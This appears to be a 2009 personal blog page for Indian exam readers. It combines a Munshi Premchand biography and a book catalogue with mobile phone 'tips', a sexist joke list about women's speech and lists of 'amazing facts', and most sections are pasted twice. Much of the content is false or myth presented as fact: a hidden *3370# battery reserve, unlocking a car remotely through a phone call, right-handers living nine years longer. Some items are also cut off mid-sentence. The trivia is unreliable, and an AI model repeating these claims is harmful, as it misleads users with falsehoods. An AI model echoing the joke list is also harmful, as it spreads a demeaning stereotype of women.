Thursday, December 31, 2009
Friday, December 18, 2009
Sorrrrryyyyyyyyyyyyy..................
last 2 months i am very bussy. so please sory again..............
Wednesday, October 28, 2009
LITERATURE BY MUNSHIPREMCHAND (GENERAL KNOWLEDGE)
Munshi Premchand lived from 1880 to 1936 and can justly lay claimto the title of the best Hindi fiction writer ever. He was born on 31July 1880 in a small village, Lamhi, near Varanasi. His parents namedhim Dhanpat Rai. He started writing at a young age. Initially, hewrote in Urdu. Later, he wrote only in Hindi.
Munshi Premchand was the son of a postal clerk. He lost his motherwhen he was very young. Just 7 years. And his at the age of 14, helost his father. With his father's demise, young Premchand took overthe responsibility of earning bread for the family. In the face ofgreat economic hardship, he matriculated. He then found employment asa schoolmaster in small village schools.
While working, Premchand continued his studies and completed hisF.A. (parallel to A-levels) and his B.A. He was keen on doing hisMasters in Literature, but circumstances in life prevented him fromdoing so.
In 1921, influenced by Mahatma Gandhi's call to leave Governmentjobs, Premchand resigned from his schoolmaster's job. He was in direeconomic straits. Yet, he gave up his 23 year old secure iflow-paying Government job. In this decision, his wife willinglysupported him.
For a few months after that, he worked for a private school inKanpur. He could not keep his job, because he was too principled andwas the victim of office politics. He resigned from there and leftfor Varanasi where he taught at the Kashi Vidyapitha for a fewmonths, and edited 'Maryada'. He then left for Lucknow where heedited 'Madhuri'. Both 'Maryada' and 'Madhuri' were literarymagazines with very low circulation and an uncertain future.
In a few years, he shifted back to Varanasi to launch his ownliterary magazine, 'Hans'. Sometime later, he launched 'Jagaran' aswell. But both magazines were loss-making enterprises. At a certainpoint in time Premchand was so heavily in debt because of editingthese magazines, he had to wind up operations and shift baggage toMumbai.
He had come to Mumbai to write for the Hindi film industry. Buthere he was constantly being asked to compromise on his storyline andthe integrity of his characters to suit the whims of film producers.Premchand refused to make such manipulations, which would hurt theflow of his story. Hence, deeply disappointed, he made his way backto Varanasi, still struggling against the onset of bankruptcy.
While in Mumbai, Premchand had fallen ill and soon after gettingback to Varanasi, he died of ascitis on 8 October, 1936.
He was given the highest accolade of his time, when he wasreferred to as "Upanyas Samrat". He wrote novels, short stories,essays and children's fiction. All that he wrote, has stood the testof time, and nearly seventy after his death, Premchand is still oneof India's best-read authors. His novels, in particular Godan,Nirmala and Ghaban; are hugely popular. His short stories, broughttogether under the title Mansarovar enjoy tremendous enthusiasmamongst readers until date.
Premchand has been translated in many languages, there are 100s ofPh.D.s awarded on his works every year. There is no University inIndia and abroad, where Hindi literature is taught and Premchand isnot an important part of the syllabus.
Premchand wrote in a very direct and simple style, and his wordsmade their own magic. His protagonists were always the people heobserved around him. His knowledge of the human psychology, and hisappreciation of the ironies of life made him a stellar writer.
In keeping with his clean-cut style and lucid manner, readingPremchand is a great pleasure! His prose is precise, his descriptionssuccinct.
Premchand lived in an era of great social turmoil for India. Hesaw traditional village independence being destroyed by thecolonisers. He saw how the traditional system of the Indian UndividedFamily was falling apart with the pressures of increasedcentralisation of jobs in urban centres. He also noted the fallout oflarge-scale urbanisation and the consequent materialistic andacquisitional tendencies it triggered off. His stories and novelfaithfully record and analyse these tendencies through the trials andtribulations of his protagonists.
Premchand observed keenly the psychology of a child, brought up inpoverty. In his short story Eidgah, the hero, a small boy from a poorfamily, goes with his relatively well-to-do friends. He has a verysmall amount of money to spare. Instead of blowing it on fun andtoys, he buys a "chimta" for his old grandmother, who used to burnher fingers on the hot iron "tava".
His novel "Godan" tells the story of a poor man, bound by thesociety, exploited by the privileged class and his soul-destroyingtravails. His protagonists are often exploited, but never unjustthemselves, and retain their humanity. The badi bahuria, in Bade GharKi Bahu, despite longing to eat a halfway decent meal, gives it tothe postman, who is actually the bearer of bad news. When the postmantries to decline, she says that she will eat some bathua saag andmanage.
Each novel, each story of Premchand reassures us that humanity isalive and well. That circumstances may be grim, but there is a godsomewhere, and things are not so bad as they may seem. Premchand seesgoodness in every human being, and hence describes people aptly. Themost mean and vicious character will suffer the occasional qualm ofconscience. And the most naive character is not without heroism. Theprotagonist of Ghaban is out to impress his newly wed wife. His taleof plight is told with understanding and empathy. The reader feels apart of Premchand's stories. All his fictional characters are real.They are living and breathing. Not just, blank ink on whitepaper.
So come, be a part of the experience. Read Munshi Premchand todiscover perceptive yet simple writing. Lucid style. Prose writing atits very best.
Had Premchand been born in America or Europe, he would havecertainly won the Nobel Prize for Literature and a knighthoodtoo!
I am proud to state that we had the privilege of being the firstpublishers of what is perhaps the greatest novel ever written inHindi - Godan.
The Complete works of Munshi Premchand
---------------------------------------------------------------
Novels
GODAN (Hindi)
By Premchand
1st ed. Mumbai: Hindi Granth Ratnakar Karyalay, 1936
Hans Prakashan
1998 223 x 135 mm 320 pp
81-85954-02-X Hardback Rs. 140
RANGABHOOMI (Hindi)
By Premchand
1st ed. Lucknow: Ganga Pustakmala, 1924
Hans Prakashan
1999 224 x 140 mm 488 pp
Hardback Rs. 200
PREMASHRAM (Hindi)
By Premchand
Hans Prakashan
1997 223 x 140 mm 424 pp
Hardback Rs. 160
KARMABHOOMI (Hindi)
By Premchand
Hans Prakashan
1998 220 x 145 mm 400 pp
Hardback Rs. 140
MANGALACHARAN (Hindi)
By Premchand
Hans Prakashan
2002 220 x 140 mm 345 pp
Hardback Rs. 140
GHABAN (Hindi)
By Premchand
Hans Prakashan
2002 215 x 130 mm 286 pp
Hardback Rs. 120
SEVASADAN (Hindi)
By Premchand
Hans Prakashan
2003 220 x 140 mm 246 pp
Hardback Rs. 100
AHANKAR (Hindi)
By Premchand
Hans Prakashan
2000 180 x 120 mm 188 pp
Hardback Rs. 60
VARDAN (Hindi)
By Premchand
Hans Prakashan
1994 180 x 120 mm 159 pp
Hardback Rs. 60
MANGALASOOTRA (Hindi)
Two novels, 'Mangalasootra' and 'Mahajani Sabhyata'
By Premchand
Hans Prakashan
1991 180 x 120 mm 188 pp
Hardback Rs. 40
NIRMALA (Hindi)
By Premchand
Hans Prakashan
2001 180 x 120 mm 176 pp
Paperback Rs. 40
PRATIGYA (Hindi)
By Premchand
Hans Prakashan
1997 180 x 120 mm 144 pp
Hardback Rs. 40
Short Stories
MANSAROVAR (Hindi)
Short Stories by Premchand in 8 Volumes
2001 180 x 120 mm approx. 3000 pp in 8 volumes
Hardback Rs. 800 for the set
QAFAN (Hindi)
Short Stories by Premchand
Hans Prakashan
1994 180 x 120 mm 135 pp
Hardback Rs. 80
GUPT DHAN (Hindi)
Short Stories by Premchand in 2 Volumes
2002 220 x 140 mm 524 pp in 2 Volumes
Hardback Rs. 200 for the set
KISHOR SAHITYA MALA (Hindi)
Stories for teenagers in 10 Volumes by Premchand
Hans Prakashan
2000 180 x 120 mm approx. 950 pp in 10 Volumes
Paperback Rs. 200 for the set
RAM CHARCHA (Hindi)
Based on the Ramayan
By Premchand
Hans Prakashan
Paperback Rs. 25
PREMCHAND : SACHITRA JIVAN PARICHAY (Hindi)
Pictoral Biography for students
Hans Prakashan
Paperback Rs. 30.00
DURGADAS (Hindi)
By Premchand
Hans Prakashan
Paperback Rs. 20
QALAM KA SIPAHI (Hindi)
Authorised Biography of Premchand
Hans Prakashan
Hardcover Rs. 250
MUNSHI PREMCHAND KI SAMPOORNA KAHANIYAN (In 2 Volumes)
By Premchand
Lokbharti
2002 215 x 140 mm 1732 pp in 2 Volumes
Paperback Rs. 400.00 for the set
ILLUSTRATED BAL SAHITYA BY PREMCHAND
----------------------------------------------------------------------
BUDHI KAKI (Hindi)
Short story by Premchand
2003 216 x 140 mm 40 pp
Paperback Rs. 20
PANCH PARAMESHVAR (Hindi)
Short story by Premchand
2003 216 x 140 mm 32 pp
Paperback Rs. 20
JUNGLE KI KAHANIYAN (Hindi)
Short story by Premchand
2003 216 x 140 mm 32 pp
Paperback Rs. 20
MERI KAHANI (Hindi)
Short story by Premchand
2003 216 x 140 mm 24 pp
Paperback Rs. 15
PARIKSHA & EIDGAH (Hindi)
Short stories by Premchand
2003 216 x 140 mm 32 pp
Paperback Rs. 15
DO BAILON KI KATHA (Hindi)
Short story by Premchand
2003 216 x 140 mm 32 pp
Paperback Rs. 15
GULLI DANDA (Hindi)
Short story by Premchand
2003 216 x 140 mm 32 pp
Paperback Rs. 15
RAM KATHA (Hindi)
Short story by Premchand
2003 216 x 140 mm 32 pp
Paperback Rs. 15
SHATRANJ KE KHILADI (Hindi)
Short story by Premchand
2003 216 x 140 mm 32 pp
Paperback Rs. 15
RAM LILA (Hindi)
Short story by Premchand
2003 216 x 140 mm 32 pp
Paperback Rs. 15
SABSE BADA TIRTHA (Hindi)
Short story by Premchand
2003 216 x 140 mm 24 pp
Paperback Rs. 15
MANDIR (Hindi)
Short story by Premchand
2003 216 x 140 mm 24 pp
Paperback Rs. 15
EID KA TYOHAR (aka EIDGAH) (Hindi)
Short story by Premchand
2003 216 x 140 mm 24 pp
Paperback Rs. 15
SHIKARI RAJKUMAR (Hindi)
Short story by Premchand
2003 216 x 140 mm 32 pp
Paperback Rs. 15
Munshi Premchand was the son of a postal clerk. He lost his motherwhen he was very young. Just 7 years. And his at the age of 14, helost his father. With his father's demise, young Premchand took overthe responsibility of earning bread for the family. In the face ofgreat economic hardship, he matriculated. He then found employment asa schoolmaster in small village schools.
While working, Premchand continued his studies and completed hisF.A. (parallel to A-levels) and his B.A. He was keen on doing hisMasters in Literature, but circumstances in life prevented him fromdoing so.
In 1921, influenced by Mahatma Gandhi's call to leave Governmentjobs, Premchand resigned from his schoolmaster's job. He was in direeconomic straits. Yet, he gave up his 23 year old secure iflow-paying Government job. In this decision, his wife willinglysupported him.
For a few months after that, he worked for a private school inKanpur. He could not keep his job, because he was too principled andwas the victim of office politics. He resigned from there and leftfor Varanasi where he taught at the Kashi Vidyapitha for a fewmonths, and edited 'Maryada'. He then left for Lucknow where heedited 'Madhuri'. Both 'Maryada' and 'Madhuri' were literarymagazines with very low circulation and an uncertain future.
In a few years, he shifted back to Varanasi to launch his ownliterary magazine, 'Hans'. Sometime later, he launched 'Jagaran' aswell. But both magazines were loss-making enterprises. At a certainpoint in time Premchand was so heavily in debt because of editingthese magazines, he had to wind up operations and shift baggage toMumbai.
He had come to Mumbai to write for the Hindi film industry. Buthere he was constantly being asked to compromise on his storyline andthe integrity of his characters to suit the whims of film producers.Premchand refused to make such manipulations, which would hurt theflow of his story. Hence, deeply disappointed, he made his way backto Varanasi, still struggling against the onset of bankruptcy.
While in Mumbai, Premchand had fallen ill and soon after gettingback to Varanasi, he died of ascitis on 8 October, 1936.
He was given the highest accolade of his time, when he wasreferred to as "Upanyas Samrat". He wrote novels, short stories,essays and children's fiction. All that he wrote, has stood the testof time, and nearly seventy after his death, Premchand is still oneof India's best-read authors. His novels, in particular Godan,Nirmala and Ghaban; are hugely popular. His short stories, broughttogether under the title Mansarovar enjoy tremendous enthusiasmamongst readers until date.
Premchand has been translated in many languages, there are 100s ofPh.D.s awarded on his works every year. There is no University inIndia and abroad, where Hindi literature is taught and Premchand isnot an important part of the syllabus.
Premchand wrote in a very direct and simple style, and his wordsmade their own magic. His protagonists were always the people heobserved around him. His knowledge of the human psychology, and hisappreciation of the ironies of life made him a stellar writer.
In keeping with his clean-cut style and lucid manner, readingPremchand is a great pleasure! His prose is precise, his descriptionssuccinct.
Premchand lived in an era of great social turmoil for India. Hesaw traditional village independence being destroyed by thecolonisers. He saw how the traditional system of the Indian UndividedFamily was falling apart with the pressures of increasedcentralisation of jobs in urban centres. He also noted the fallout oflarge-scale urbanisation and the consequent materialistic andacquisitional tendencies it triggered off. His stories and novelfaithfully record and analyse these tendencies through the trials andtribulations of his protagonists.
Premchand observed keenly the psychology of a child, brought up inpoverty. In his short story Eidgah, the hero, a small boy from a poorfamily, goes with his relatively well-to-do friends. He has a verysmall amount of money to spare. Instead of blowing it on fun andtoys, he buys a "chimta" for his old grandmother, who used to burnher fingers on the hot iron "tava".
His novel "Godan" tells the story of a poor man, bound by thesociety, exploited by the privileged class and his soul-destroyingtravails. His protagonists are often exploited, but never unjustthemselves, and retain their humanity. The badi bahuria, in Bade GharKi Bahu, despite longing to eat a halfway decent meal, gives it tothe postman, who is actually the bearer of bad news. When the postmantries to decline, she says that she will eat some bathua saag andmanage.
Each novel, each story of Premchand reassures us that humanity isalive and well. That circumstances may be grim, but there is a godsomewhere, and things are not so bad as they may seem. Premchand seesgoodness in every human being, and hence describes people aptly. Themost mean and vicious character will suffer the occasional qualm ofconscience. And the most naive character is not without heroism. Theprotagonist of Ghaban is out to impress his newly wed wife. His taleof plight is told with understanding and empathy. The reader feels apart of Premchand's stories. All his fictional characters are real.They are living and breathing. Not just, blank ink on whitepaper.
So come, be a part of the experience. Read Munshi Premchand todiscover perceptive yet simple writing. Lucid style. Prose writing atits very best.
Had Premchand been born in America or Europe, he would havecertainly won the Nobel Prize for Literature and a knighthoodtoo!
I am proud to state that we had the privilege of being the firstpublishers of what is perhaps the greatest novel ever written inHindi - Godan.
The Complete works of Munshi Premchand
---------------------------------------------------------------
Novels
GODAN (Hindi)
By Premchand
1st ed. Mumbai: Hindi Granth Ratnakar Karyalay, 1936
Hans Prakashan
1998 223 x 135 mm 320 pp
81-85954-02-X Hardback Rs. 140
RANGABHOOMI (Hindi)
By Premchand
1st ed. Lucknow: Ganga Pustakmala, 1924
Hans Prakashan
1999 224 x 140 mm 488 pp
Hardback Rs. 200
PREMASHRAM (Hindi)
By Premchand
Hans Prakashan
1997 223 x 140 mm 424 pp
Hardback Rs. 160
KARMABHOOMI (Hindi)
By Premchand
Hans Prakashan
1998 220 x 145 mm 400 pp
Hardback Rs. 140
MANGALACHARAN (Hindi)
By Premchand
Hans Prakashan
2002 220 x 140 mm 345 pp
Hardback Rs. 140
GHABAN (Hindi)
By Premchand
Hans Prakashan
2002 215 x 130 mm 286 pp
Hardback Rs. 120
SEVASADAN (Hindi)
By Premchand
Hans Prakashan
2003 220 x 140 mm 246 pp
Hardback Rs. 100
AHANKAR (Hindi)
By Premchand
Hans Prakashan
2000 180 x 120 mm 188 pp
Hardback Rs. 60
VARDAN (Hindi)
By Premchand
Hans Prakashan
1994 180 x 120 mm 159 pp
Hardback Rs. 60
MANGALASOOTRA (Hindi)
Two novels, 'Mangalasootra' and 'Mahajani Sabhyata'
By Premchand
Hans Prakashan
1991 180 x 120 mm 188 pp
Hardback Rs. 40
NIRMALA (Hindi)
By Premchand
Hans Prakashan
2001 180 x 120 mm 176 pp
Paperback Rs. 40
PRATIGYA (Hindi)
By Premchand
Hans Prakashan
1997 180 x 120 mm 144 pp
Hardback Rs. 40
Short Stories
MANSAROVAR (Hindi)
Short Stories by Premchand in 8 Volumes
2001 180 x 120 mm approx. 3000 pp in 8 volumes
Hardback Rs. 800 for the set
QAFAN (Hindi)
Short Stories by Premchand
Hans Prakashan
1994 180 x 120 mm 135 pp
Hardback Rs. 80
GUPT DHAN (Hindi)
Short Stories by Premchand in 2 Volumes
2002 220 x 140 mm 524 pp in 2 Volumes
Hardback Rs. 200 for the set
KISHOR SAHITYA MALA (Hindi)
Stories for teenagers in 10 Volumes by Premchand
Hans Prakashan
2000 180 x 120 mm approx. 950 pp in 10 Volumes
Paperback Rs. 200 for the set
RAM CHARCHA (Hindi)
Based on the Ramayan
By Premchand
Hans Prakashan
Paperback Rs. 25
PREMCHAND : SACHITRA JIVAN PARICHAY (Hindi)
Pictoral Biography for students
Hans Prakashan
Paperback Rs. 30.00
DURGADAS (Hindi)
By Premchand
Hans Prakashan
Paperback Rs. 20
QALAM KA SIPAHI (Hindi)
Authorised Biography of Premchand
Hans Prakashan
Hardcover Rs. 250
MUNSHI PREMCHAND KI SAMPOORNA KAHANIYAN (In 2 Volumes)
By Premchand
Lokbharti
2002 215 x 140 mm 1732 pp in 2 Volumes
Paperback Rs. 400.00 for the set
ILLUSTRATED BAL SAHITYA BY PREMCHAND
----------------------------------------------------------------------
BUDHI KAKI (Hindi)
Short story by Premchand
2003 216 x 140 mm 40 pp
Paperback Rs. 20
PANCH PARAMESHVAR (Hindi)
Short story by Premchand
2003 216 x 140 mm 32 pp
Paperback Rs. 20
JUNGLE KI KAHANIYAN (Hindi)
Short story by Premchand
2003 216 x 140 mm 32 pp
Paperback Rs. 20
MERI KAHANI (Hindi)
Short story by Premchand
2003 216 x 140 mm 24 pp
Paperback Rs. 15
PARIKSHA & EIDGAH (Hindi)
Short stories by Premchand
2003 216 x 140 mm 32 pp
Paperback Rs. 15
DO BAILON KI KATHA (Hindi)
Short story by Premchand
2003 216 x 140 mm 32 pp
Paperback Rs. 15
GULLI DANDA (Hindi)
Short story by Premchand
2003 216 x 140 mm 32 pp
Paperback Rs. 15
RAM KATHA (Hindi)
Short story by Premchand
2003 216 x 140 mm 32 pp
Paperback Rs. 15
SHATRANJ KE KHILADI (Hindi)
Short story by Premchand
2003 216 x 140 mm 32 pp
Paperback Rs. 15
RAM LILA (Hindi)
Short story by Premchand
2003 216 x 140 mm 32 pp
Paperback Rs. 15
SABSE BADA TIRTHA (Hindi)
Short story by Premchand
2003 216 x 140 mm 24 pp
Paperback Rs. 15
MANDIR (Hindi)
Short story by Premchand
2003 216 x 140 mm 24 pp
Paperback Rs. 15
EID KA TYOHAR (aka EIDGAH) (Hindi)
Short story by Premchand
2003 216 x 140 mm 24 pp
Paperback Rs. 15
SHIKARI RAJKUMAR (Hindi)
Short story by Premchand
2003 216 x 140 mm 32 pp
Paperback Rs. 15
FOUR THINGS YOU PROBABLY NEVER KNEW YOUR MOBILE PHONE COULD DO
There are a few things that can be done in times of grave emergencies. Your mobile phone can actually be a life saver or an emergency tool for survival. Check out the things that you can do with it:
FIRST Emergency
The Emergency Number worldwide for Mobile is 112. If you find yourself out of the coverage area of your mobile; network and there is an emergency, dial 112 and the mobile will search any existing network to establish the emergency number for you, and interestingly this number 112 can be dialed even if the keypad is locked. Try it out.
SECOND have you locked your keys in the car?
Does your car have remote keyless entry? This may come in handy someday. Good reason to own a cell phone: If you lock your keys in the car and the spare keys are at home, call someone at home on their mobile phone from your cell phone.
Hold your cell phone about a foot from your car door and have the person at your home press the unlock button, holding it near the mobile phone on their end. Your car will unlock. This saves someone from having to drive your keys to you. Distance is no object. You could be hundreds of miles away, and if you can reach someone who has the other 'remote' for your car, you can unlock the doors (or the trunk).
THIRD Hidden Battery Power
Imagine your mobile battery is very low. To activate, press the keys *3370# Your mobile will restart with this reserve and the instrument will show a 50% increase in battery. This reserve will get charged when you charge your mobile next time.
FOURTH How to disable a STOLEN mobile phone?
To check your Mobile phone's serial number, key in the following digits on your phone: * # 0 6 #
A 15 digit code will appear on the screen. This number is unique to your handset. Write it down and keep it somewhere safe. When your phone get stolen, you can phone your service provider and give them this code. They will then be able to block your handset so even if the thief changes the SIM card, your phone will be totally useless. You probably won't get your phone back, but at least you know that whoever stole it can't use/sell it either. If everybody does this, there would be no point in people stealing mobile phones.
FIRST Emergency
The Emergency Number worldwide for Mobile is 112. If you find yourself out of the coverage area of your mobile; network and there is an emergency, dial 112 and the mobile will search any existing network to establish the emergency number for you, and interestingly this number 112 can be dialed even if the keypad is locked. Try it out.
SECOND have you locked your keys in the car?
Does your car have remote keyless entry? This may come in handy someday. Good reason to own a cell phone: If you lock your keys in the car and the spare keys are at home, call someone at home on their mobile phone from your cell phone.
Hold your cell phone about a foot from your car door and have the person at your home press the unlock button, holding it near the mobile phone on their end. Your car will unlock. This saves someone from having to drive your keys to you. Distance is no object. You could be hundreds of miles away, and if you can reach someone who has the other 'remote' for your car, you can unlock the doors (or the trunk).
THIRD Hidden Battery Power
Imagine your mobile battery is very low. To activate, press the keys *3370# Your mobile will restart with this reserve and the instrument will show a 50% increase in battery. This reserve will get charged when you charge your mobile next time.
FOURTH How to disable a STOLEN mobile phone?
To check your Mobile phone's serial number, key in the following digits on your phone: * # 0 6 #
A 15 digit code will appear on the screen. This number is unique to your handset. Write it down and keep it somewhere safe. When your phone get stolen, you can phone your service provider and give them this code. They will then be able to block your handset so even if the thief changes the SIM card, your phone will be totally useless. You probably won't get your phone back, but at least you know that whoever stole it can't use/sell it either. If everybody does this, there would be no point in people stealing mobile phones.
TRANSLATING WOMEN'S ENGLISH:
Yes = No
No = Yes
Maybe = No
We need = I want
I'm sorry = You'll be sorry
We need to talk = I need to complain
Sure...go ahead = I don't want you to
Is my butt fat? = Tell me I'm beautiful
Do what you want = You'll pay for this later
I'm not upset = Of course I'm upset, you moron!
Are you listening to me?? = Too late, you're dead
You have to learn to communicate = Just agree with me
Be romantic, turn out the lights = I have flabby thighs
You're so.. manly = You need a shave and you sweat a lot
Do you love me? = I'm going to ask for something expensive
It's your decision = The correct decision should be obvious by now
You're certainly attentive tonight = Is sex all you ever think about??
I'll be ready in a minute = Kick off your shoes and find a good game on TV
How much do you love me? = I did something today that you're really not
going to like.
No = Yes
Maybe = No
We need = I want
I'm sorry = You'll be sorry
We need to talk = I need to complain
Sure...go ahead = I don't want you to
Is my butt fat? = Tell me I'm beautiful
Do what you want = You'll pay for this later
I'm not upset = Of course I'm upset, you moron!
Are you listening to me?? = Too late, you're dead
You have to learn to communicate = Just agree with me
Be romantic, turn out the lights = I have flabby thighs
You're so.. manly = You need a shave and you sweat a lot
Do you love me? = I'm going to ask for something expensive
It's your decision = The correct decision should be obvious by now
You're certainly attentive tonight = Is sex all you ever think about??
I'll be ready in a minute = Kick off your shoes and find a good game on TV
How much do you love me? = I did something today that you're really not
going to like.
SOME MORE FACTS
Ø Intelligent people have more zinc and copper in their hair
Ø The world's youngest parents were 8 and 9 and lived in China in 1910.
Ø Our eyes remain the same size from birth onward, but our noses and ears
never stop growing.
Ø You burn more calories sleeping than you do watching TV.
Ø A person will die from total lack of sleep sooner than from starvation.
Ø Death will occur about 10 days without sleep, while starvation takes a
few weeks.
Ø Chewing gum while peeling onions will keep you from crying.
Ø The Mona Lisa has no eyebrows.
Ø When the moon is directly overhead, you weigh slightly less.
Ø Alexander Graham Bell, the inventor of the telephone, never telephoned
his Wife or mother because they were both deaf.
Ø "I am." is the shortest complete sentence in the English language
Ø Colgate faced big obstacle marketing toothpaste in Spanish speaking
countries because Colgate translates into the command "go hang yourself."
Ø The smallest unit of time is the yoctosecond
Ø Like fingerprints, everyone's tongue print is different
Ø "Bookkeeper" is the only word in English language with three consecutive
double letters
Ø Right handed people live, on average, nine years longer than left handed
people do
Ø The sentence "the quick brown fox jumps over the lazy dog" uses every
letter in the English language
Ø If the population of China walked past you in single line, the line would
never end because of the rate of reproduction
Ø China has more English speakers than the United States
Ø Every human spent about half an hour as a single cell.
Ø Each square inch of human skin consists of twenty feet of blood vessels.
Ø The longest place name still in use is:
Taumatawhakatangiha ngaoauauotametea turi-Pukakpikima ungahoronukupoka iwhe
nuakitanatahu- a New Zealand hill
Ø If you leave Tokyo by plane at 7:00am, you will arrive in Honolulu (US)
at approximately 4:30pm the previous day.
Ø The world's youngest parents were 8 and 9 and lived in China in 1910.
Ø Our eyes remain the same size from birth onward, but our noses and ears
never stop growing.
Ø You burn more calories sleeping than you do watching TV.
Ø A person will die from total lack of sleep sooner than from starvation.
Ø Death will occur about 10 days without sleep, while starvation takes a
few weeks.
Ø Chewing gum while peeling onions will keep you from crying.
Ø The Mona Lisa has no eyebrows.
Ø When the moon is directly overhead, you weigh slightly less.
Ø Alexander Graham Bell, the inventor of the telephone, never telephoned
his Wife or mother because they were both deaf.
Ø "I am." is the shortest complete sentence in the English language
Ø Colgate faced big obstacle marketing toothpaste in Spanish speaking
countries because Colgate translates into the command "go hang yourself."
Ø The smallest unit of time is the yoctosecond
Ø Like fingerprints, everyone's tongue print is different
Ø "Bookkeeper" is the only word in English language with three consecutive
double letters
Ø Right handed people live, on average, nine years longer than left handed
people do
Ø The sentence "the quick brown fox jumps over the lazy dog" uses every
letter in the English language
Ø If the population of China walked past you in single line, the line would
never end because of the rate of reproduction
Ø China has more English speakers than the United States
Ø Every human spent about half an hour as a single cell.
Ø Each square inch of human skin consists of twenty feet of blood vessels.
Ø The longest place name still in use is:
Taumatawhakatangiha ngaoauauotametea turi-Pukakpikima ungahoronukupoka iwhe
nuakitanatahu- a New Zealand hill
Ø If you leave Tokyo by plane at 7:00am, you will arrive in Honolulu (US)
at approximately 4:30pm the previous day.
Some interesting Amazing Facts (GK)
• Napoleon's christening name was Italian: Napoleone Buonaparte(OR Bonaparte). He was born on the island of Corsica one year after it became French property. As a boy, Napoleon hated the French.
• The brain of an average adult male weighs 1,375 gm (55 oz). The brain of Russian novelist Turgenev weighed 2021 gm (81 oz), Bismark's weighed 1807 gm (72 oz), while that of French statesman Gambetta was only 1294 gm (51 oz). Einstein's brain was of average size.
• The oldest living thing on earth is 12,000 years old. It is the flowering shrubs called creosote bushes in the Mojave Desert.
• Money notes are not made from paper, they are made mostly from a special blend of cotton and linen. In 1932, when a shortage of cash occurred in Tenino, Washington, USA, notes were made out of wood for a brief period.
• Tea is said to have been discovered in 2737 BC by a Chinese emperor when some tea leaves accidentally blew into a pot of boiling water. The tea bag was introduced in 1908 by Thomas Sullivan of New York.
• Over the last 150 years the average height of people in industrialised nations has increased 10 cm (about 4 inches). In the 19th century, American men were the tallest in the world, averaging 1,71m (5'6"). Today, the average height for American men is 1,75m (5'7"), compared to 1,77 (5'8") for Swedes, and 1,78 (5'8.5") for the Dutch. The tallest nation in the world is the Watusis of Burundi.
• In 1955 the richest woman in the world was Mrs Hetty Green Wilks, who left an estate of $95 million in a will that was found in a tin box with four pieces of soap. Queen Elizabeth of Britain and Queen Beatrix of the Netherlands count under the 10 wealthiest women in the world.
• According to a study by the Economic Research Service, 27% of all food production in Western nations ends up in garbage cans. Yet, 1,2 billion people are underfed - the same number of people who are overweight.
• A person can live without food for about a month, but only about a week without water. If the amount of water in your body is reduced by just 1%, you'll feel thirsty. If it's reduced by 10%, you'll die.
• The system of democracy was introduced 2 500 years ago in Athens, Greece. The oldest existing governing body operates in Althing in Iceland. It was established in 930 AD.
• The brain of an average adult male weighs 1,375 gm (55 oz). The brain of Russian novelist Turgenev weighed 2021 gm (81 oz), Bismark's weighed 1807 gm (72 oz), while that of French statesman Gambetta was only 1294 gm (51 oz). Einstein's brain was of average size.
• The oldest living thing on earth is 12,000 years old. It is the flowering shrubs called creosote bushes in the Mojave Desert.
• Money notes are not made from paper, they are made mostly from a special blend of cotton and linen. In 1932, when a shortage of cash occurred in Tenino, Washington, USA, notes were made out of wood for a brief period.
• Tea is said to have been discovered in 2737 BC by a Chinese emperor when some tea leaves accidentally blew into a pot of boiling water. The tea bag was introduced in 1908 by Thomas Sullivan of New York.
• Over the last 150 years the average height of people in industrialised nations has increased 10 cm (about 4 inches). In the 19th century, American men were the tallest in the world, averaging 1,71m (5'6"). Today, the average height for American men is 1,75m (5'7"), compared to 1,77 (5'8") for Swedes, and 1,78 (5'8.5") for the Dutch. The tallest nation in the world is the Watusis of Burundi.
• In 1955 the richest woman in the world was Mrs Hetty Green Wilks, who left an estate of $95 million in a will that was found in a tin box with four pieces of soap. Queen Elizabeth of Britain and Queen Beatrix of the Netherlands count under the 10 wealthiest women in the world.
• According to a study by the Economic Research Service, 27% of all food production in Western nations ends up in garbage cans. Yet, 1,2 billion people are underfed - the same number of people who are overweight.
• A person can live without food for about a month, but only about a week without water. If the amount of water in your body is reduced by just 1%, you'll feel thirsty. If it's reduced by 10%, you'll die.
• The system of democracy was introduced 2 500 years ago in Athens, Greece. The oldest existing governing body operates in Althing in Iceland. It was established in 930 AD.
Some of the Various Amazing Facts of Animals
• Did you know fishes talk to each other? Some of them communicate by making noises in their throats by rasping their teeth, others use their swim bladders to make sounds.
• The bird that can fly the fastest is called a White It can fly up to 95 miles per hour.
• Did you know there are two kinds of pandas? There is the Long-tailed Himalayan carnivore that looks like a raccoon and there is the Giant panda bear that lives in Western China.
• The Blue Whale's whistle is the loudest noise made by an animal.
• Did you know there are two kinds of camels? One is the Arabian that lives in Western Asia and Northern Africa. It has one hump. And the second kind is called Bactrian which has two humps and lives in Mongolia and Chinese Turkistan.
• There are two kinds of elephants: the African that is taller and has larger ears and the Indian that is small and has smaller ears.
• The smallest bird in the world is the Hummingbird. It weighs 1oz.
• The fastest human swimmer can swim at 6 miles per hour. The fastest mammal - the dolphin - can swim up to 35 miles per hour.
• The bird that can fly the fastest is called a White It can fly up to 95 miles per hour.
• Did you know there are two kinds of pandas? There is the Long-tailed Himalayan carnivore that looks like a raccoon and there is the Giant panda bear that lives in Western China.
• The Blue Whale's whistle is the loudest noise made by an animal.
• Did you know there are two kinds of camels? One is the Arabian that lives in Western Asia and Northern Africa. It has one hump. And the second kind is called Bactrian which has two humps and lives in Mongolia and Chinese Turkistan.
• There are two kinds of elephants: the African that is taller and has larger ears and the Indian that is small and has smaller ears.
• The smallest bird in the world is the Hummingbird. It weighs 1oz.
• The fastest human swimmer can swim at 6 miles per hour. The fastest mammal - the dolphin - can swim up to 35 miles per hour.
Some Amazing India Facts (GK FOR CHHATTISGARH SHIKSHAKARMI EXAM 2009)
• The official Sanskrit name for India is Bharat.
• INDIA has been called Bharat even in Satya yuga ( Golden Age )
• The name `India’ is derived from the River Indus, the valleys around which were the home of the early settlers. The Aryan worshippers referred to the river Indus as the Sindhu.
• The Persian invaders converted it into Hindu. The name `Hindustan’ combines Sindhu and Hindu and thus refers to the land of the Hindus.
• The number system was invented by India. Aryabhatta was the scientist who invented the digit zero.
• Sanskrit is considered as the mother of all higher languages. This is because it is the most precise, and therefore suitable language for computer software. ( a report in Forbes magazine, July 1987 ).
• Chess was invented in India.
• Algebra, Trigonometry and Calculus are studies which originated in India.
• The' place value system' and the 'decimal system' were developed in 100 BC in India.
• The first six Mogul Emperor's of India ruled in an unbroken succession from father to son for two hundred years, from 1526 to 1707.
